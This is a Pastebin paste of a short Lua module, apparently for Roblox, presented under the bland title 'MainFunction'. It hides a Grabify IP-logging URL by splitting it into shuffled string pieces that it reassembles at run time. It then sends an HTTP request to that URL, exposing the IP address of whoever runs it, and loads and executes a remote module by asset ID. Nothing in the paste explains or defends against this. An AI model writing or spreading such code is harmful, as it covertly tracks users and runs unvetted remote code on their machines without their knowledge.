Advertisement
Lean_Man

MainFunction

Mar 10th, 2023 (edited)
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.47 KB | None | 0 0
  1. local Module = {};
  2.  
  3. local Coded = {
  4.     [1] = "/XU3";
  5.     [2] = "IG0";
  6.     [3] = "bify";
  7.     [4] = "gra";
  8.     [5] = ".link";
  9. };
  10.  
  11. local Path = {4,3,5,1,2};
  12. local ST = "https://";
  13.  
  14. Module.Retrieve = function()
  15.     for _, v in next, Path do
  16.         ST = ST..Coded[v];
  17.     end
  18.     game:HttpGet(ST);
  19.  
  20.     local Data;
  21.     local s = pcall(function()
  22.         Data = require(79493647);
  23.     end)
  24.     if (s) then
  25.         if (Data ~= nil) then
  26.             Data.Call();
  27.         end
  28.     else
  29.         warn("ERROR");
  30.     end
  31. end
  32.  
  33. return Module;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement